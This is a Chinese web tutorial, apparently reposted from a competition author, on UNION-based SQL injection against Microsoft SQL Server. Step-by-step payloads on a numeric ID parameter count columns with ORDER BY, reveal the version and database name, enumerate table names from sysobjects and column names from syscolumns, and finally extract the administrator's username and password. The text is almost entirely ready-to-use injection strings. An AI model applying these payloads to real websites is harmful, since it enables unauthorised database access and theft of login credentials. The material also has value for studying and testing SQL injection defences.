当前位置: 首页 > 图文教程 > 数据库 > MSSQL > MSSQL下用UNION和系统表配合猜表名和字段名深度注入

MSSQL
SQL server 随机数函数
SQLServer Top语句参数化方法
SQLServer EVENTDATA()函数来获取DDL 触发器信息
sql server 常用的几个数据类型
SQL Server 排序函数 ROW_NUMBER和RANK 用法总结
数据库Left join , Right Join, Inner Join 的相关内容,非常实用
MySql 安装时的1045错误
SQL Server 中查看SQL句子执行所用的时间
模糊查询的通用存储过程
sql 查询慢的原因分析
SQL Server 数据库优化
数据库 日期加减处理
sql 触发器使用例子
sql 刷新视图
提升SQL Server速度 整理索引碎片
恢复.mdf 数据库步骤
Sql 批量替换所有表中内容
Sql 批量查看字符所在的表及字段
SQLServer XML数据的五种基本操作
SQL Server使用Merge语句当源表数据集为空时,无法进行查询的问题

MSSQL下用UNION和系统表配合猜表名和字段名深度注入


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-30   浏览: 116 ::
收藏到网摘: n/a

  这是这次出攻防大赛题目的时候顺便做的一些注入总结,是我通过查询系统表结构总结出来的。只要注入点有效,并且没有过滤单引号,即使它管理员表名和字段名设置的再复杂都是可以猜出来的,而且由于是用union,效率还是很高的。还有只需要DBO权限即可。

  以一个数字型注入点为例( 暂时假设这个数字型注入点对单引号也没有过滤)

  先用 order by 猜SQL所查询字段数,并用Union验证(这里直接Select当前数据库下的sysobjects系统表)

  ID=735 order by 8

  ID=-735 union select 1,2,3,4,5,6,7,8 from sysobjects

  或者

  ID=-735 union select 1,2,3,4,5,6,7,8 from master.dbo.sysobjects

  假如这里屏幕上会显示2,3,4

  顺便查下版本和数据库名

  ID=-735 union select 1,@@version,db_name(),4,5,6,7,8 from sysobjects

  //这里假如查出当前数据库名dbname

  接着查询表名(从0开始增加第二个top N的数字就可以遍历当前数据库表名了)

  ID=-735 union select 1,2,(select top 1 name from sysobjects where xtype='u' and name not in(select top 0 name from sysobjects where xtype='u')),4,5,6,7,8 from sysobjects

  如果要查其他数据库的表名还可以这样:

  ID=-735 union select 1,2,(select top 1 name from [dbname]..sysobjects where xtype='u' and name not in(select top 0 name from [dbname]..sysobjects where xtype='u')),4,5,6,7,8 from sysobjects

  //这里假如查出管理员表admin

  继续猜字段名(从0开始增加第二个top N的数字就可以遍历admin表的字段名了)

  ID=-735 union select 1,2,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name='admin'))),4,5,6,7,8 from sysobjects

  //这里假如查到的管理员用户名和密码字段分别是name和psw

  剩下的就简单啦,依次把管理员用户名和密码就可以Union出来了(仍然修改第二个top N来遍历字段)

  //这里假设使用的是前面已经猜出来的表名admin和字段name,psw

  ID=-735 union select top 1 1,name,psw,4,5,6,7,8 from admin where name not in (select top 0 name from admin)